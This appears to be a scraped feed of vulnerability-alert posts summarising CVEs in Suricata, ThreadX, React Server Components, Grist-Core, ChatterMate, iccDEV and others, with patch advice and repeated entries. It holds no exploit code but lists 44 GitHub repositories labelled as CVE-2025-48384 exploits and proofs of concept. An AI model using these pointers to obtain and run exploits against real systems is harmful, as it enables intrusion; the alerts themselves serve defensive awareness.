Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, crafted DCERPC traffic can cause Suricata to expand a buffer w/o limits, leading to memory exhaustion and the process getting killed. While reported for DCERPC over...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22258/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-22258 - High (7.5)
Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, crafted DCERPC traffic can cause Suricata to expand a buffer w/o limits, leading to memory exhaustion and the process getting killed. While reported for DCERPC over...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22258/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-0648 - High (7.8)
The vulnerability stems from an incorrect error-checking logic in the CreateCounter() function (in threadx/utility/rtos_compatibility_layers/OSEK/tx_osek.c) when handling the return value of osek_get_counter(). Specifically, the current code chec...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0648/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-0648 - High (7.8)
The vulnerability stems from an incorrect error-checking logic in the CreateCounter() function (in threadx/utility/rtos_compatibility_layers/OSEK/tx_osek.c) when handling the return value of osek_get_counter(). Specifically, the current code chec...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0648/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Critical Cellbreak Vulnerability in Grist-Core Enables Remote Code Execution
Grist-Core patched a critical vulnerability (CVE-2026-24002) that allows attackers to execute remote code via malicious spreadsheet formulas. The flaw enables unauthorized access to host systems, database credentials, and sensitive internal files.
**If you're running Grist-Core, immediately update to version 1.7.9 to fix this flaw. There's a PoC available, so exploits will start VERY SOON. If you can't update right away, change your GRIST_SANDBOX_FLAVOR setting to "gvisor" as an interim protection measure.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-cellbreak-vulnerability-in-grist-core-enables-remote-code-execution-u-x-w-v-x/gD2P6Ple2L
Critical Cellbreak Vulnerability in Grist-Core Enables Remote Code Execution
Grist-Core patched a critical vulnerability (CVE-2026-24002) that allows attackers to execute remote code via malicious spreadsheet formulas. The flaw enables unauthorized access to host systems, database credentials, and sensitive internal files.
**If you're running Grist-Core, immediately update to version 1.7.9 to fix this flaw. There's a PoC available, so exploits will start VERY SOON. If you can't update right away, change your GRIST_SANDBOX_FLAVOR setting to "gvisor" as an interim protection measure.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-cellbreak-vulnerability-in-grist-core-enables-remote-code-execution-u-x-w-v-x/gD2P6Ple2L
π CVE-2026-23864 - High (7.5)
Multiple denial of service vulnerabilities exist in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack.
The vulnerabilities are triggered by sending specially c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23864/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##New React.js patches released today for CVE-2026-23864. Fixes for DoS issues reported by several people, including Yours Truly π
The blog post at https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components has been updated with the new info. #react
##2 posts
44 repos
https://github.com/s41r4j/CVE-2025-48384-submodule
https://github.com/p1026/CVE-2025-48384
https://github.com/kallydev/cve-2025-48384-hook
https://github.com/fishyyh/CVE-2025-48384
https://github.com/elprogramadorgt/CVE-2025-48384
https://github.com/vignesh21-git/CVE-2025-48384
https://github.com/EdwardYeIntrix/CVE-2025-48384-Scanner
https://github.com/IK-20211125/CVE-2025-48384
https://github.com/beishanxueyuan/CVE-2025-48384
https://github.com/jacobholtz/CVE-2025-48384-poc
https://github.com/vinieger/vinieger-CVE-2025-48384-Dockerfile
https://github.com/altm4n/cve-2025-48384
https://github.com/liamg/CVE-2025-48384
https://github.com/jacobholtz/CVE-2025-48384-submodule
https://github.com/liamg/CVE-2025-48384-submodule
https://github.com/arun1033/CVE-2025-48384
https://github.com/simplyfurious/CVE-2025-48384-submodule_test
https://github.com/ECHO6789/CVE-2025-48384-submodule
https://github.com/mukesh-610/cve-2025-48384
https://github.com/f1shh/CVE-2025-48384
https://github.com/beishanxueyuan/CVE-2025-48384-test
https://github.com/fluoworite/CVE-2025-48384-sub
https://github.com/replicatorbot/CVE-2025-48384-POC
https://github.com/Anezatraa/CVE-2025-48384-submodule
https://github.com/greatyy/CVE-2025-48384-p
https://github.com/s41r4j/CVE-2025-48384
https://github.com/testdjshan/CVE-2025-48384
https://github.com/replicatorbot/CVE-2025-48384
https://github.com/mukesh-610/cve-2025-48384-exploit
https://github.com/fluoworite/CVE-2025-48384
https://github.com/fishyyh/CVE-2025-48384-POC
https://github.com/vignesh21-git/CVE-2025-48384-submodule
https://github.com/eliox01/CVE-2025-48384
https://github.com/acheong08/CVE-2025-48384
https://github.com/zr0n/CVE-2025-48384-sub
https://github.com/MarcoTondolo/cve-2025-48384-poc
https://github.com/butyraldehyde/CVE-2025-48384-PoC-Part2
https://github.com/admin-ping/CVE-2025-48384-RCE
https://github.com/ppd520/CVE-2025-48384
https://github.com/altm4n/cve-2025-48384-hub
https://github.com/NigelX/CVE-2025-48384
https://github.com/butyraldehyde/CVE-2025-48384-PoC
New. This addresses CVE-2025-48384 and CVE-2025-41244.
Dell Security Update for CloudBoost Virtual Appliance Multiple Vulnerabilities https://www.dell.com/support/kbdoc/en-us/000419894/dsa-2026-025-security-update-for-dell-cloudboost-virtual-appliance-multiple-vulnerabilities #Dell #infosec #vulnerability
##π CVE-2026-24469 - High (7.5)
C++ HTTP Server is an HTTP/1.1 server built to handle client connections and serve HTTP requests. Versions 1.0 and below are vulnerable to Path Traversal via the RequestHandler::handleRequest method. This flaw allows an unauthenticated, remote att...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24469/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24399 - Critical (9.3)
ChatterMate is a no-code AI chatbot agent framework. In versions 1.0.8 and below, the chatbot accepts and executes malicious HTML/JavaScript payloads when supplied as chat input. Specifically, an payload containing a javascript: URI can be proces...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24399/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24399 - Critical (9.3)
ChatterMate is a no-code AI chatbot agent framework. In versions 1.0.8 and below, the chatbot accepts and executes malicious HTML/JavaScript payloads when supplied as chat input. Specifically, an payload containing a javascript: URI can be proces...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24399/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24406 - High (8.8)
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccTagNamedColor2::SetSize(). This occurs when user-contro...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24406/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24406 - High (8.8)
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccTagNamedColor2::SetSize(). This occurs when user-contro...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24406/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24405 - High (8.8)
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccMpeCalculator::Read(). This occurs when user-controllab...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24405/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##